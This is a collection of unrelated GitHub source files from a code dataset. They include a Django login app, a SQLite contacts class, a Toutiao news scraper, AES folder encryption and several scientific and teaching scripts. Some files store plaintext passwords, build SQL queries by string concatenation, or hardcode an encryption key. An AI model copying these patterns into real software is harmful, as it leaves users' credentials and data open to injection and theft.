object\n        self.right = None # Points to another TreeNode object\n","repo_name":"sandeepyadav10011995/Data-Structures","sub_path":"Binary Tree/Test A Tree For The BST Property.py","file_name":"Test A Tree For The BST Property.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34721650436","text":"def win(s: int, m: int) -> bool:\n    \"\"\"Determines whether a winning strategy exists for the given number of stones and move number\n\n    Args:\n        s (int): number of stones\n        m (int): move number (odd - Petya, even - Vanya)\n\n    Returns:\n        bool: whether a strategy exists\n    \"\"\"\n    if 45 <= s <= 112:\n        return m % 2 == 0\n    if s > 112:\n        return m % 2 != 0\n    if m == 0:\n        return False\n    next_win = [win(s+2, m-1), win(s*3, m-1)]\n    return any(next_win) if (m-1) % 2 == 0 else all(next_win)\n\n\nprint(f'19) {[s for s in range(1, 45) if win(s, 2)]}') \nprint(f'20) {[s for s in range(1, 45) if not win(s, 1) and win(s, 3)]}')\nprint(f'21) {[s for s in range(1, 45) if not win(s, 2) and win(s, 4)]}')","repo_name":"niknibud-student/ege","sub_path":"stream_2023/1921_3082.py","file_name":"1921_3082.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41105647118","text":"#!/usr/bin/python3\n\nif __name__ == \"__main__\":\n    \"\"\"Print all names defined by hidden_4 module.\"\"\"\n    import my_module\n\n    my_names = dir(my_module)\n    for my_name in my_names:\n        if my_name[:2] != \"__\":\n            print(my_name)\n","repo_name":"Queenbaloyi/alx-higher_level_programming","sub_path":"0x02-python-import_modules/4-hidden_discovery.py","file_name":"4-hidden_discovery.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"28716798223","text":"import time\n\nclass CalculatorBuget:\n def __init__(self):\n self.venituri = 0\n self.cheltuieli = 0\n self.sold = 0\n\n def adauga_venit(self, suma):\n self.venituri += suma\n self.sold += suma\n\n def adauga_cheltuiala(self, suma):\n self.cheltuieli += suma\n self.sold -= suma\n\n def afiseaza_sold(self):\n print(f\"Soldul curent este: {self.sold}\")\n\n def sfaturi_economisire(self):\n if self.venituri > self.cheltuieli:\n economisire_recomandata = (self.venituri - self.cheltuieli) * 0.2\n print(f\"Recomandarea pentru economisire: Economisiți cel puțin 20% din soldul total, adica {economisire_recomandata:.2f}\")\n else:\n print(\"Recomandarea pentru economisire: Încercați să economisiți mai mult pentru a vă echilibra bugetul.\")\n\n\ncalculator = CalculatorBuget()\n\nwhile True:\n print(\"\\n1. Adaugă venit\")\n print(\"2. Adaugă cheltuială\")\n print(\"3. Afisează sold\")\n print(\"4. Sfaturi de economisire\")\n print(\"5. Ieși din aplicație\")\n\n optiune = input(\"Alege o opțiune: \")\n\n if optiune == \"1\":\n suma_venit = float(input(\"Introduceți suma venitului: \"))\n calculator.adauga_venit(suma_venit)\n print(\"Venit adăugat cu succes!\")\n time.sleep(3)\n elif optiune == \"2\":\n suma_cheltuiala = float(input(\"Introduceți suma cheltuielii: \"))\n calculator.adauga_cheltuiala(suma_cheltuiala)\n print(\"Cheltuială adăugată cu succes!\")\n time.sleep(3)\n elif optiune == \"3\":\n calculator.afiseaza_sold()\n time.sleep(3)\n elif optiune == \"4\":\n calculator.sfaturi_economisire()\n time.sleep(3)\n elif optiune == \"5\":\n print(\"Aplicația a fost închisă.\")\n break\n else:\n print(\"Opțiune invalidă. Vă rugăm să introduceți o opțiune validă.\")\n time.sleep(3)\n","repo_name":"MicuSebastianCristian/Small-Useful-Projects","sub_path":"2. 
 Calculator Buget si Sfaturi Financiare/Calculator_buget_si_sfaturi_financiare.py","file_name":"Calculator_buget_si_sfaturi_financiare.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10630228150","text":"# pylint: disable=locally-disabled, too-few-public-methods, no-self-use, invalid-name, broad-except\n\"\"\"test_conn.py - Unit tests related to connections to HAProxy.\"\"\"\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))\nfrom haproxy import conn\nimport unittest\nfrom socket import AF_INET, AF_UNIX\n\nclass SimpleConnMock(object):\n    \"\"\"Simple socket mock.\"\"\"\n    def __init__(self, stype, stream):\n        self.stype = stype\n        self.stream = stream\n\n    def connect(self, addr):\n        \"\"\"Mocked socket.connect method.\"\"\"\n        pass\n\nclass TestConnection(unittest.TestCase):\n    \"\"\"Tests different aspects of haproxyctl's connections to HAProxy.\"\"\"\n\n    def testConnSimple(self):\n        \"\"\"Tests that connection to a non-protocol path works and falls back to a UNIX socket.\"\"\"\n        sfile = \"/some/path/to/socket.sock\"\n        c = conn.HaPConn(sfile, socket_module=SimpleConnMock)\n        addr, stype = c.sfile\n        self.assertEqual(sfile, addr)\n        self.assertEqual(stype, AF_UNIX)\n\n    def testConnUnixString(self):\n        \"\"\"Tests that unix:// protocol works and connects to a socket.\"\"\"\n        sfile = \"unix:///some/path/to/socket.socket\"\n        c = conn.HaPConn(sfile, socket_module=SimpleConnMock)\n        addr, stype = c.sfile\n        self.assertEqual(\"/some/path/to/socket.socket\", addr)\n        self.assertEqual(stype, AF_UNIX)\n\n    def testConnTCPString(self):\n        \"\"\"Tests that tcp:// protocol works and connects to an IP.\"\"\"\n        sfile = \"tcp://1.2.3.4:8080\"\n        c = conn.HaPConn(sfile, socket_module=SimpleConnMock)\n        addr, stype = c.sfile\n        ip, port = addr\n        self.assertEqual(\"1.2.3.4\", ip)\n        self.assertEqual(8080, port)\n        self.assertEqual(stype, AF_INET)\n\n    def testConnTCPStringNoPort(self):\n        \"\"\"Tests that passing a tcp:// address with no port raises an Exception.\"\"\"\n        sfile = \"tcp://1.2.3.4\"\n        # Not using assertRaises because we still support 2.6\n        try:\n            conn.HaPConn(sfile, socket_module=SimpleConnMock)\n            raise Exception('Connection should have thrown an exception')\n        except conn.HapError:\n            pass\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"opnsense/plugins","sub_path":"net/haproxy/src/opnsense/scripts/OPNsense/HAProxy/lib/haproxy/tests/test_conn.py","file_name":"test_conn.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":762,"dataset":"github-code","pt":"72"} +{"seq_id":"16979620760","text":"import pytest\nimport pandas as pd\n\nfrom pipelitools.preprocessing import features as f\nfrom sklearn.datasets import make_classification\n\n# indices_dict = {\n#     \"dataframe\": pd.DataFrame(data={'a': [1, 2, 32, 4],\n#                                     'dates': ['21.04.2021', '31.05.2020', '01.07.2021', '30.01.2000'],\n#                                     'values': [564, 698, 2, 415],\n#                                     'values2': [1,3,9,2]})\n# }\n#\n#\n# @pytest.fixture(params=indices_dict.keys())\n# def df(request):\n#     \"\"\"\n#     Fixture for dataframes.\n#     \"\"\"\n#     return indices_dict[request.param].copy()\n\n\n@pytest.fixture(scope=\"function\")\ndef df_binary():\n    X_train, y_train = make_classification(n_samples=100, n_features=50, n_informative=2,\n                                           n_redundant=0, n_repeated=0, n_classes=2, n_clusters_per_class=1,\n                                           class_sep=2, flip_y=0, weights=[0.5, 0.5], random_state=1)\n    X_test, y_test = 
make_classification(n_samples=50, n_features=50, n_informative=2,\n n_redundant=0, n_repeated=0, n_classes=2, n_clusters_per_class=1,\n class_sep=2, flip_y=0, weights=[0.5, 0.5], random_state=2)\n y_train = pd.Series(y_train)\n y_test = pd.Series(y_test)\n return X_train, y_train, X_test, y_test\n\n\ndef test_low_variance(df_binary):\n X_train, y_train, X_test, y_test = df_binary\n df = pd.DataFrame(X_train)\n df['y'] = y_train\n cls = f.FeatureSelectionPipeline(df)\n\n\ndef test_RFE_selection(df_binary):\n X_train, y_train, X_test, y_test = df_binary\n df = pd.DataFrame(X_train)\n df['y'] = y_train\n cls = f.FeatureSelectionPipeline(df)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nastiag67/pipelitools","sub_path":"tests/preprocessing/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72420462633","text":"import os\nimport pygame.freetype\npygame.freetype.init()\nFPS = 60\n\nBUTTON_COOLDOWN_EVENT = pygame.USEREVENT + 1\nFont = pygame.freetype.Font(os.path.join(\"Fonts\", \"beastboss_font.ttf\"))\n\nALLOWED_KEYS = [pygame.K_0, pygame.K_1, pygame.K_2, pygame.K_3, pygame.K_4, pygame.K_5, pygame.K_6, pygame.K_7, pygame.K_8, pygame.K_9, pygame.K_BACKSPACE]\n\nclass App:\n WIDTH, HEIGHT = 1280, 720\n WINDOW = pygame.display.set_mode((WIDTH, HEIGHT), pygame.RESIZABLE)\n DARK_MODE = False\n BACKGROUND = (255, 255, 255)\n FOREGROUND = (0, 0, 0)\n SELECTED_FILE = \"\"\n QUANTITY = \"1\"\n BUTTONS_ENABLED = True\n LEFT_MOUSE_RELEASED = False\n SELECTED_PRINTER = None\n FILE_HANDLER = None\n PRINTER_HANDLER = None\n","repo_name":"RealTheBeastBoss/PrintApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20340052326","text":"import requests\nimport json\nimport csv\nimport time\nimport random\nimport execjs\n\nf = open(r\"sign.js\", 'r', encoding='UTF-8')\nline = f.readline()\nhtmlstr = ''\nwhile line:\n htmlstr = htmlstr + line\n line = f.readline()\nctx = execjs.compile(htmlstr)\n\ndef saveContent(data,fileName):\n for d in data:\n title = d[\"title\"]\n comment_count = d[\"comments_count\"]\n create_time = d[\"behot_time\"]\n play_effective_count = str(d[\"detail_play_effective_count\"])\n source_url = \"https://www.toutiao.com\"+str(d[\"source_url\"])\n file = open(fileName+\".csv\", \"a\", encoding=\"utf-8\", newline='')\n writer = csv.writer(file)\n writer.writerow([title, play_effective_count, comment_count, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(create_time)), source_url])\n file.close()\n\ndef getHeader(uid,cookie,path):\n header = {\n \"accept\": \"application/json, text/javascript\",\n \"accept-encoding\": \"gzip, deflate, br\",\n \"accept-language\": \"zh-CN,zh;q=0.9,en;q=0.8\",\n \"content-type\": \"application/x-www-form-urlencoded\",\n \"cookie\": cookie,\n \"referer\": \"https://www.toutiao.com/c/user/%s/\" %(uid),\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko\",\n \"x-requested-with\": \"XMLHttpRequest\",\n }\n return header\n\ndef getUrl(uid, max_behot_time):\n Honey = json.loads(ctx.call('get_as_cp_signature', uid, max_behot_time))\n a = Honey['as']\n c = Honey['cp']\n signature = Honey['_signature']\n url = 
\"https://www.toutiao.com/c/user/article/?page_type=0&user_id=%s&max_behot_time=%s&count=20&as=%s&cp=%s&_signature=%s\" %(uid,max_behot_time,a,c,signature)\n    return url\n\n\ndef mainProcess(name, uid ,mid):\n    print(\"Start crawling:\", name)\n    file = open(name+\".csv\", \"w\", encoding=\"utf-8\",newline='')\n    writer = csv.writer(file)\n    writer.writerow([\"Title\", \"Play count\", \"Comment count\", \"Publish time\", \"Play URL\"])\n    file.close()\n    max_behot_time = 0\n    cookie = \"\"\n    old_max_behot_time = 0\n    while(True):\n        url = getUrl(uid, max_behot_time)\n        path = url[23:]\n        response = requests.get(url, headers=getHeader(uid, cookie, path))\n        content = response.text\n        try:\n            cookie = response.headers[\"set-cookie\"]\n            cookie = str(cookie).split(\";\")[0]\n        except:\n            cookie = cookie\n        result = json.loads(content)\n        time.sleep(random.randint(0,3))\n        try:\n            nextValue = result[\"next\"]\n            max_behot_time = nextValue[\"max_behot_time\"]\n            if old_max_behot_time == max_behot_time:\n                break\n            data = result[\"data\"]\n            saveContent(data, name)\n            old_max_behot_time = max_behot_time\n        except:\n            continue\n    return 0\n\n\nidFile = open(\"id.txt\", \"r\", encoding=\"utf-8\")\n\nfor id in idFile.readlines():\n    finish = open(\"finish.txt\", \"r\", encoding=\"utf-8\")\n    s = set()\n    for line in finish.readlines():\n        if line.isspace() or len(line) == 0:\n            continue\n        line = line[:len(line)-1]\n        line = line.split(\" \")\n        s.add(line[1])\n    finish.close()\n    finish = open(\"finish.txt\", \"a\", encoding=\"utf-8\")\n    id = id.replace(\"\\n\",\"\")\n    ids = id.split(\" \")\n    if ids[1] not in s:\n        result = mainProcess(ids[0], ids[1],ids[2].replace(\"\\n\",\"\"))\n        if result==0:\n            finish.write(id+\"\\n\")\n    finish.close()\nprint(\"success\")","repo_name":"WhiteBugs/toutiao_crawl","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38142813869","text":"import frappe\nfrom frappe.custom.doctype.custom_field.custom_field import create_custom_fields\n\n\ndef execute():\n\tfrappe.reload_doc(\"buying\", \"doctype\", \"supplier\", force=True)\n\tfrappe.reload_doc(\"selling\", \"doctype\", \"customer\", force=True)\n\tfrappe.reload_doc(\"core\", \"doctype\", \"doctype\", force=True)\n\n\tcustom_fields = {\n\t\t\"Supplier\": [\n\t\t\t{\"fieldname\": \"pan\", \"label\": \"PAN\", \"fieldtype\": \"Data\", \"insert_after\": \"supplier_type\"}\n\t\t],\n\t\t\"Customer\": [\n\t\t\t{\"fieldname\": \"pan\", \"label\": \"PAN\", \"fieldtype\": \"Data\", \"insert_after\": \"customer_type\"}\n\t\t],\n\t}\n\n\tcreate_custom_fields(custom_fields, update=True)\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/patches/v13_0/create_pan_field_for_india.py","file_name":"create_pan_field_for_india.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"23024532450","text":"# Bokeh code I can use later\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.io import output_notebook\n\noutput_notebook()\n\nbtc = ''\neth = ''\n\np1 = figure(x_axis_type = 'datetime', title = 'Crypto Prices', width = 800)\np1.grid.grid_line_alpha = 0.3\np1.xaxis.axis_label = 'Date'\np1.yaxis.axis_label = 'Price'\n\np1.line(btc.index, btc['ClosePrice'], color = '#f2a980', legend = 'Bitcoin')\np1.line(eth.index, eth['ClosePrice'], color = '#f2a980', legend = 'Ether')\n\np1.legend.location =
'top_left'\nshow(p1)\n","repo_name":"joe-jngigi/lux_data_engineering","sub_path":"practise_tutor/bokeh.py","file_name":"bokeh.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"11134686633","text":"import math\nimport fastPow\nimport miller_robin\n\n\ndef power(N):\n    def isPower(l, r, s, N):\n        if (l > r):\n            return -1\n        mid = (l + r) // 2  # integer midpoint: true division would pass a float index to fastPowBool\n        ans = fastPow.fastPowBool(mid, s, N)\n        if (ans == N):\n            return mid\n        elif (ans < N):\n            return isPower(mid+1, r, s, N)\n        else:\n            return isPower(l, mid-1, s, N)\n\n    s = int(math.floor(math.log(N, 2))) + 1\n    r = int(math.floor(math.sqrt(N))) + 1\n    for i in range(2, s):\n        ans = isPower(2, r, i, N)\n        if ans != -1:\n            return ans\n    return -1\n","repo_name":"Michaelvll/myQShor","sub_path":"Classical/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"72"}
+{"seq_id":"37895818065","text":"#!/usr/bin/env python\n\n# test of first-generation TDI X noise with the baseline configuration,\n# and with a bad proof-mass noise\n\n# this script demonstrates the generation of a TDI X time series with\n# custom noise objects, and in particular:\n# - creating a LISA geometry object\n# - creating a TDInoise object based on standard pseudorandom noises\n# - creating a TDInoise object based on custom spectral density values\n# for the noises\n# - calling getobs to get an array of X values at equispaced times\n# - getting the spectrum of the time series and writing it to disk\n\n# import all the libraries that are needed\n\nfrom synthlisa import *\nimport numpy\n\n# we create a LISA geometry object corresponding to a stationary LISA\n# with equal armlengths\n\noriginallisa = OriginalLISA(16.6782,16.6782,16.6782)\n\n# create a TDInoise object with standard pseudorandom noises\n\nstime = 4.0\n\noriginalnoise = TDInoise(originallisa,\n    stime, 2.5e-48, # all six proof masses get this\n    stime, 1.8e-37, # all six optical-path noises get this\n    stime, 1.1e-26) # all six laser noises get this\n\n# create a TDInoise object with custom parameters for the eighteen\n# here pm_1 (unstarred) is a hundred times worse, in power\n\nbadnoise = TDInoise(originallisa,\n    [PowerLawNoise(stime,256.0,2.5e-46,-2.0,1)] + [PowerLawNoise(stime,256.0,2.5e-48,-2.0,1) for i in range(5)],\n    [PowerLawNoise(stime,256.0,1.8e-37,2.0,1) for i in range(6)],\n    [PowerLawNoise(stime,256.0,1.1e-26,0.0,1) for i in range(6)])\n\n# get the time series; since they're from different TDInoise objects,\n# there's no point in doing them together\n\nsamples = 2**19 # 2**18 takes 22 s on a 1.25GHz G4\n\npatches = 1024\n\nnoisegood = getobsc(samples,stime,originalnoise.Xm)\n\n[noisebad,noisebad2,noisebad3] = numpy.transpose(getobsc(samples,stime,[badnoise.Xm,badnoise.Ym,badnoise.Zm]))\n\n# compute spectra, and write to disk\n\nmyspecgood = spect(noisegood,stime,patches)\nwritearray('data/tdibadmass-good.txt',myspecgood[1:])\n\nmyspecbad = spect(noisebad,stime,patches)\nwritearray('data/tdibadmass-bad.txt', myspecbad[1:])\n\nmyspecbad2 = spect(noisebad2,stime,patches)\nwritearray('data/tdibadmass-bad2.txt',myspecbad2[1:])\n\nmyspecbad3 = 
spect(noisebad3,stime,patches)\nwritearray('data/tdibadmass-bad3.txt',myspecbad3[1:])\n","repo_name":"vallis/synthlisa","sub_path":"examples/manual-examples/test-tdibadmass.py","file_name":"test-tdibadmass.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"}
+{"seq_id":"25531265439","text":"from django.shortcuts import render\nfrom . import form\n# Create your views here.\nfrom login import models\nfrom django.shortcuts import redirect\n\nfrom .models import Group\n\n\ndef index(request):\n    test_class = models.CreateClass.objects.all()\n    context = {'create_class': test_class}\n    return render(request, 'index.html', context)\n\n\ndef login(request):\n    if request.session.get('is_login', None): # do not allow a second login\n        return redirect('index')\n    if request.method == 'POST':\n        login_form = form.UserForm(request.POST)\n        message = 'Please check your input!'\n        if login_form.is_valid():\n            username = login_form.cleaned_data.get('username')\n            password = login_form.cleaned_data.get('password')\n            identify = login_form.cleaned_data.get('identify')\n            try:\n                user = models.User.objects.get(name=username)\n            except models.User.DoesNotExist:\n                message = 'User does not exist!'\n                return render(request, 'login_base.html', locals())\n\n            if user.password == password:\n                request.session['is_login'] = True\n                request.session['user_id'] = user.id\n                request.session['user_name'] = user.name\n                request.session['user_identify'] = user.identify\n                return redirect('index')\n            else:\n                message = 'Incorrect password!'\n                return render(request, 'login_base.html', locals())\n        else:\n            return render(request, 'login_base.html', locals())\n\n    login_form = form.UserForm()\n    return render(request, 'login_base.html', locals())\n\n\ndef register(request):\n    if request.session.get('is_login', None):\n        return redirect('/index/')\n\n    if request.method == 'POST':\n        register_form = form.RegisterForm(request.POST)\n        message = \"Please check your input!\"\n        if register_form.is_valid():\n            username = register_form.cleaned_data.get('username')\n            password1 = register_form.cleaned_data.get('password1')\n            password2 = register_form.cleaned_data.get('password2')\n            email = register_form.cleaned_data.get('email')\n            sex = register_form.cleaned_data.get('sex')\n            identify = register_form.cleaned_data.get('identify')\n            if password1 != password2:\n                message = 'The two passwords do not match!'\n                return render(request, 'register_base.html', locals())\n            else:\n                same_name_user = models.User.objects.filter(name=username)\n                if same_name_user:\n                    message = 'Username already exists'\n                    return render(request, 'register_base.html', locals())\n                same_email_user = models.User.objects.filter(email=email)\n                if same_email_user:\n                    message = 'Email already exists!'\n                    return render(request, 'register_base.html', locals())\n\n                new_user = models.User()\n                new_user.name = username\n                new_user.password = password1\n                new_user.email = email\n                new_user.sex = sex\n                new_user.identify = identify\n                new_user.save()\n\n                return redirect('login')\n        else:\n            return render(request, 'register_base.html', locals())\n    register_form = form.RegisterForm()\n    return render(request, 'register_base.html', locals())\n\n\ndef logout(request):\n    if not request.session.get('is_login', None):\n        return redirect('index')\n    request.session.flush()\n    # alternatively, delete the session keys one by one:\n    # del request.session['is_login']\n    # del request.session['user_id']\n    # del request.session['user_name']\n    return redirect(\"index\")\n\n\ndef create_class(request):\n    # if request.session['user_identify'] == 'teacher':\n    if request.method == 'POST':\n        class_form = 
form.ClassForm(request.POST)\n        if class_form.is_valid():\n            class_form.save()\n            return redirect('index')\n    else:\n        class_form = form.ClassForm()\n    context = {\n        'class_form': class_form,\n    }\n    return render(request, 'create_class.html', context)\n\n\ndef create_activate(request):\n    class_c = models.CreateClass.objects.all()\n    if request.method == 'POST':\n        activate = form.ActivateForm(request.POST)\n        if activate.is_valid():\n            activate.save()\n            return redirect('index')\n    else:\n        activate = form.ActivateForm()\n    context = {\n        'class_c': class_c,\n        'activate': activate,\n    }\n    return render(request, 'create_activate.html', context)\n\n\ndef view_activate(request, pk):\n    activate_a = models.CreateActivate.objects.filter(class_id=pk)\n    context = {\n        'activate_a': activate_a,\n        'pk': pk\n    }\n    return render(request, 'view_activate.html', context)\n\n\ndef view_group(request, pk):\n    activate_a = models.CreateActivate.objects.filter(id=pk)\n    group_a = models.Group.objects.all()\n    context = {\n        'activate_a': activate_a,\n        'group_a': group_a,\n        'pk': pk\n    }\n    return render(request, 'view_group.html', context)\n\n\ndef create_group(request, pk):\n    activate_a = models.CreateActivate.objects.filter(id=pk)\n    user_a = models.User.objects.all()\n    if request.method == 'POST':\n        group = form.CreateGroup(request.POST)\n        tests = request.POST.getlist('check_box_list')\n        if group.is_valid():\n            obj = group.save()\n            for t in tests:\n                obj.group_user.add(t)\n            obj.save()\n            return redirect('index')\n    else:\n        group = form.CreateGroup()\n    context = {\n        'user_a': user_a,\n        'activate_a': activate_a,\n        'group': group\n    }\n    return render(request, 'create_group.html', context)\n","repo_name":"s9011810/testpbl","sub_path":"pbl/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"15930542456","text":"import os\nimport hashlib\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Padding\n\ndef encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):\n    if not out_filename:\n        out_filename = in_filename + '.enc'\n    iv = os.urandom(16)\n    encryptor = AES.new(key, AES.MODE_CBC, iv)\n    filesize = os.path.getsize(in_filename)\n    with open(in_filename, 'rb') as infile:\n        with open(out_filename, 'wb') as outfile:\n            outfile.write(filesize.to_bytes(8, 'big'))\n            outfile.write(iv)\n            while True:\n                chunk = infile.read(chunksize)\n                if len(chunk) == 0:\n                    break\n                if len(chunk) % AES.block_size != 0:\n                    # only the final, short chunk needs padding; padding every\n                    # chunk would leave stray pad bytes inside multi-chunk files\n                    chunk = Padding.pad(chunk, AES.block_size, style='pkcs7')\n                outfile.write(encryptor.encrypt(chunk))\n\ndef decrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):\n    if not out_filename:\n        out_filename = os.path.splitext(in_filename)[0]\n    with open(in_filename, 'rb') as infile:\n        original_size = int.from_bytes(infile.read(8), 'big')\n        iv = infile.read(16)\n        decryptor = AES.new(key, AES.MODE_CBC, iv)\n        with open(out_filename, 'wb') as outfile:\n            while True:\n                chunk = infile.read(chunksize)\n                if len(chunk) == 0:\n                    break\n                outfile.write(decryptor.decrypt(chunk))\n            outfile.truncate(original_size)\n\ndef encrypt_folder(key, in_folder, out_folder=None):\n    if not out_folder:\n        out_folder = in_folder + '.enc'\n    if not os.path.exists(out_folder):\n        os.makedirs(out_folder)\n    for root, dirs, files in os.walk(in_folder):\n        for dir in dirs:\n            encrypt_folder(key, os.path.join(root, dir), os.path.join(out_folder, dir))\n        for file in files:\n            encrypt_file(key, os.path.join(root, file), os.path.join(out_folder, file))\n\ndef 
decrypt_folder(key, in_folder, out_folder=None):\n    if not out_folder:\n        out_folder = os.path.splitext(in_folder)[0]\n    if not os.path.exists(out_folder):\n        os.makedirs(out_folder)\n    for root, dirs, files in os.walk(in_folder):\n        for dir in dirs:\n            decrypt_folder(key, os.path.join(root, dir), os.path.join(out_folder, dir))\n        for file in files:\n            decrypt_file(key, os.path.join(root, file), os.path.join(out_folder, file))\n\n\nif __name__ == '__main__':\n    key = hashlib.sha256('secret_key'.encode()).digest()\n    in_folder = 'example_folder'\n    out_folder = 'encrypted_folder'\n    encrypt_folder(key, in_folder, out_folder)\n    decrypt_folder(key, out_folder)","repo_name":"Danchivskyi/Cybersecurity-tasks","sub_path":"Folder-and-file-Encryption.py","file_name":"Folder-and-file-Encryption.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"28715891699","text":"#!/usr/bin/python3\n\"\"\"Contacts\n\nManage contacts from the database\n\"\"\"\nimport logging\nfrom docopt import docopt\nimport sqlite3\nfrom src.app_user import *\n# Not necessarily useful\n\n\nclass contacts:\n    \"\"\" Contacts classes to manage the database from the client\n    \"\"\"\n\n    DB_NAME = \"contacts.db\"\n    USERNAME_COL_NAME = 'name'\n    COLUMN_NAMES = (USERNAME_COL_NAME,\"password\",\"pubkey\",\"ip\")\n\n    conn = None\n    def __init__(self,db_path,usr):\n        if db_path == \"\" or usr is None:\n            raise ValueError\n        \n        try :\n            self.conn = sqlite3.connect(db_path)\n        except ConnectionError:\n            raise \n        self.cur = self.conn.cursor()\n        query = \"create table if not exists \"+usr.name+\" (\"+ contacts.COLUMN_NAMES[0] + \" UNIQUE\"\n        for col in contacts.COLUMN_NAMES[1:] :\n            query += \", \" + col \n        query += ');'\n        self.cur.execute(query)\n        self.owner = usr\n\n    def add_user(self,usr) :\n        \"\"\"Insert an app_user into the database\n        Args:\n\t\tusr_name (usr) : an app_user \n\t\t\n\t\"\"\" \n        query = \"INSERT INTO \"+ self.owner.name + \"(\" +contacts.COLUMN_NAMES[0]\n        var_field = \"(?\"\n        for col in contacts.COLUMN_NAMES[1:] :\n            query += \" , \" + col \n            var_field += \",?\"\n\n        query += \") values \" + var_field +\")\"\n        \n        self.cur.execute(query,(usr.name,usr.password,usr.pubkey,usr.ip))\n        self.conn.commit()\n\n    def get_user(self,usr_name) :\n        \"\"\" Return an app_user from the database\n\t\tArgs:\n\t\tusr_name (String) : the name of the user we want to retrieve\n\t\t\n\t\tReturns:\n        appUser: the user retrieved from the database\n\t\"\"\" \n        query = \"SELECT * FROM \"+self.owner.name+\" WHERE \"+contacts.USERNAME_COL_NAME + \" = '\" +usr_name +\"'\"\n        fields = self.cur.execute(query).fetchall()\n        print(fields[0])\n        return app_user(fields[0][0],fields[0][1],fields[0][2],fields[0][3])\n\n    def get_users(self) :\n        \"\"\" Return all the app users from the database\n\n\t\tReturns:\n        appUser[]: the users retrieved from the database\n\t\"\"\" \n        query = \"SELECT * FROM \"+self.owner.name\n        fields = self.cur.execute(query).fetchall()\n        users = []\n        for usr_info in fields :\n            users.append(app_user(usr_info[0],usr_info[1],usr_info[2],usr_info[3]))\n\n        return users\n\n\nif __name__ == \"__main__\" :\n    Contacts = contacts(\"\")","repo_name":"PolyCoro/CoroMail","sub_path":"src/contacts.py","file_name":"contacts.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"18205063707","text":"#!/usr/bin/env python\n\nimport shapely.geometry\nimport shapely.ops\nimport numpy\nimport 
xarray\nimport os\nimport matplotlib.pyplot as plt\nimport pyproj\nimport zipfile\nimport shutil\n\nfrom geometric_features import GeometricFeatures, FeatureCollection\nfrom geometric_features.feature_collection import _round_coords\n\nfrom geometric_features.download import download_files\nfrom geometric_features.utils import write_feature_names_and_tags\n\n\ndef bedmap2_bin_to_netcdf(outFileName):\n\n if os.path.exists(outFileName):\n return\n\n fields = ['bed', 'surface', 'thickness', 'coverage', 'rockmask',\n 'grounded_bed_uncertainty', 'icemask_grounded_and_shelves']\n\n allExist = True\n for field in fields:\n fileName = 'bedmap2/bedmap2_bin/bedmap2_{}.flt'.format(field)\n if not os.path.exists(fileName):\n allExist = False\n break\n\n if not allExist:\n # download\n baseURL = 'https://secure.antarctica.ac.uk/data/bedmap2'\n fileNames = ['bedmap2_bin.zip']\n\n download_files(fileNames, baseURL, 'bedmap2')\n\n print('Decompressing Bedmap2 data...')\n # unzip\n with zipfile.ZipFile('bedmap2/bedmap2_bin.zip', 'r') as f:\n f.extractall('bedmap2/')\n print(' Done.')\n\n print('Converting Bedmap2 to NetCDF...')\n ds = xarray.Dataset()\n x = numpy.linspace(-3333000., 3333000., 6667)\n y = x\n ds['x'] = ('x', x)\n ds.x.attrs['units'] = 'meters'\n ds['y'] = ('y', y)\n ds.y.attrs['units'] = 'meters'\n ds.attrs['Grid'] = \"Datum = WGS84, earth_radius = 6378137., \" \\\n \"earth_eccentricity = 0.081819190842621, \" \\\n \"falseeasting = -3333000., \" \\\n \"falsenorthing = -3333000., \" \\\n \"standard_parallel = -71., central_meridien = 0, \" \\\n \"EPSG=3031\"\n ds.attrs['proj'] = \"+proj=stere 